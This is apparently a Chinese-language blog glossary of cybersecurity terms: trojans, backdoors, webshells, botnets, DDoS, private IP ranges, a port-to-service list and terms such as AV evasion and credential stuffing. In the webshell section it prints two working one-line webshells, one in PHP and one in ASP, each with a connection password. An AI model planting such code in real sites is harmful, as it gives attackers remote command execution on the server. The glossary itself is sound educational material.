常见网络安全名词
木马
木马是指恶意代码伪装成正常的程序,当被运行时,会获取到整个系统的权限,比如往年的灰鸽子,蜜蜂大盗等,木马基本有四个特征:隐蔽性,欺骗性,顽固性和危害性。木马种类繁多。
网页木马
网页木马是指恶意网页伪装成正常的页面,如果受害者的系统或者浏览器存在漏洞,网页木马会利用漏洞自动下载执行到受害者电脑中。
后门(backdoor)
后门是指攻击者在通过特定手段方式进入了系统后,通过写入或者上传特定程序或者修改某些配置进系统,从而获得更加长久的控制权,这种方式往往比较难被发现,相当于小偷进了你的房间,走的时候还配了一把钥匙,方便进出。
网站后门(webshell)
网站后门又可以称为webshell,通过一段特定的代码或者在某些文件中添加代码植入到网站的服务器中,使用中国菜刀或者蚁剑,冰蝎等连接工具进行连接,和backdoor差不多,植入后门后,会获取到整个系统的权限。常见的网站后门用PHP和ASP,JSP写的,比如常见的一句话木马。
一句话木马
代码语言:javascript复制一句话木马是指通过一段代码就可以达到控制对方服务器权限的后门文件。
PHP:
<?php @eval($_POST['vfree']);?>
//vfree就是连接密码
代码语言:javascript复制ASP:
<%execute request("vfree")%>
//vfree就是连接密码
肉鸡
所谓肉鸡,就是那种被攻破的系统可以随意被攻击者使用而不被发现,被攻破的系统可以是Windows,Linux,unix等操作系统,当前最大ddos攻击基本上都是通过控制几十台甚至几百台肉鸡同时发起攻击。
跳板
跳板机常和肉鸡相辅相成使用,一般可以用跳板机去攻击入侵别人的主机。
DDOS
DDOS指分布式拒绝服务攻击,DDOS是网络中最为常见且最难防御的一种攻击方式,通过几十台主机甚至几百台肉鸡主机同时对一个网站进行访问攻击,由于请求过多,严重时可以导致宕机,使得网站无法为正常访问的用户提供服务。当前的防御方式基本上都是"搞对抗",使用一些高防,大带宽或者流量清洗设备来抵御,但是这种方式往往是治标不治本。
内网
代码语言:javascript复制内网就是局域网,比如校园网,公司内部网络等这些都属于局域网,常见的内网IPA段有192,172,10
内网网段保留IP:
10.0.0.0—10.255.255.255
172.16.0.0—172.31.255.255
192.168.0.0—192.168.255.255
外网
外网就是连接internet(互联网),只有连接地了外网才能访问网站等,外网ip不会使用内网的保留ip段。
IP地址
ip地址可以在互联网中标识每一台主机,由四个点分10进制的数组成,每个点中的数值范围只能取0-255,比如8.8.8.8
端口
端口相当于数据出入地大门,端口范围:1-65535,部分端口是保留端口,有着自己对应的服务,比如开启网站服务,就会默认开启80端口。部分端口服务对应关系见下表:
端口服务对应关系
21端口 21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。 22端口 ssh 服务,传统的网络服务程序,SSH的英文全称是Secure SHell。通过使用SSH,你可以把所有传输的数据进行加密,这样“中间人”这种攻击方式就不可能实现了,而且也能够防止DNS和IP欺骗。还有一个额外的好处就是传输的数据是经过压缩的,所以可以加快传输的速度。SSH有很多功能,它既可以代替telnet,又可以为ftp、pop、甚至ppp提供一个安全的“通道”。 23端口 23端口主要用于Telnet(远程登录)服务,是Internet上普遍采用的登录和仿真程序。 25端口 25端口为SMTP(Simple Mail Transfer Protocol,简单邮件传输协议)服务器所开放,主要用于发送邮件,如今绝大多数邮件服务器都使用该协议。 53端口 53端口为DNS(Domain Name Server,域名服务器)服务器所开放,主要用于域名解析,DNS服务在NT系统中使用的最为广泛。 67、68端口 67、68端口分别是为Bootp服务的Bootstrap Protocol Server(引导程序协议服务端)和Bootstrap Protocol Client(引导程序协议客户端)开放的端口。 69端口 TFTP服务,TFTP是Cisco公司开发的一个简单文件传输协议,类似于FTP。 79端口 79端口是为Finger服务开放的,主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。 80端口 80端口是为HTTP(HyperText Transport Protocol,超文本传输协议)开放的,这是上网冲浪使用最多的协议,主要用于在WWW(World Wide Web,万维网)服务上传输信息的协议。 99端口 99端口是用于一个名为“Metagram Relay”(亚对策延时)的服务,该服务比较少见,一般是用不到的。 109、110端口 109端口是为POP2(Post Office Protocol Version 2,邮局协议2)服务开放的,110端口是为POP3(邮件协议3)服务开放的,POP2、POP3都是主要用于接收邮件的,目前POP3使用的比较多,许多服务器都同时支持POP2和POP3。客户端可以使用POP3协议来访问服务端的邮件服务,如今ISP的绝大多数邮件服务器都是使用该协议。在使用电子邮件客户端程序的时候,会要求输入POP3服务器地址,默认情况下使用的就是110端口。 111端口 111端口是SUN公司的RPC(Remote Procedure Call,远程过程调用)服务所开放的端口,主要用于分布式系统中不同计算机的内部进程通信,RPC在多种网络服务中都是很重要的组件。 113端口 113端口主要用于Windows的“Authentication Service”(验证服务)。 119端口 119端口是为“Network News Transfer Protocol”(网络新闻组传输协议,简称NNTP)开放的。 135端口 135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。 137端口 137端口主要用于“NetBIOS Name Service”(NetBIOS名称服务),属于UDP端口,使用者只需要向局域网或互联网上的某台计算机的137端口发送一个请求,就可以获取该计算机的名称、注册用户名,以及是否安装主域控制器、IIS是否正在运行等信息。 139端口 139端口是为“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。在Windows中要在局域网中进行文件的共享,必须使用该服务。 143端口 143端口主要是用于“Internet Message Access Protocol”v2(Internet消息访问协议,简称IMAP)。 161端口 161端口是用于“Simple Network Management Protocol”(简单网络管理协议,简称SNMP)。 443端口 443端口即网页浏览端口,主要是用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。 554端口 554端口默认情况下用于“Real Time Streaming Protocol”(实时流协议,简称RTSP)。 1024端口 1024端口一般不固定分配给某个服务,在英文中的解释是“Reserved”(保留)。 1080端口 1080端口是Socks代理服务使用的端口,大家平时上网使用的WWW服务使用的是HTTP协议的代理服务。 1755端口 1755端口默认情况下用于“Microsoft Media Server”(微软媒体服务器,简称MMS)。 4000端口 4000端口是用于大家经常使用的QQ聊天工具的,再细说就是为QQ客户端开放的端口,QQ服务端使用的端口是8000。 5554端口 在今年4月30日就报道出现了一种针对微软lsass服务的新蠕虫病毒——震荡波(Worm.Sasser),该病毒可以利用TCP 5554端口开启一个FTP服务,主要被用于病毒的传播。 5632端口 5632端口是被大家所熟悉的远程控制软件pcAnywhere所开启的端口。 8080端口 8080端口同80端口,是被用于WWW代理服务的,可以实现网页
免杀
免杀就是指通过技术手段对木马进行加壳,加密,修改特征码,添加花指令等方式,绕过杀毒软件的查杀。
蜜罐
蜜罐相当于模拟一个真实的环境,也可以是比真实环境更易受攻击,但是不会影响到正常的业务进行,后台人员可以通过蜜罐捕获的内容进行分析,查看真实环境中哪里易受攻击。
脱库
入侵了数据库后,将整个数据库库下载下来,这种行为成为“拖库”,不是“脱裤子”嗷,不过也可以亲切成为“脱裤”。
撞库
通过已有的数据库,使用用户名密码去测试其他站点的登陆页面
ROOT
unix系统中的最高权限用户,拥有着控制整个系统权限。
权限
权限大小决定当前用户对这个文件有什么操作权限,是否可删,可查,可写。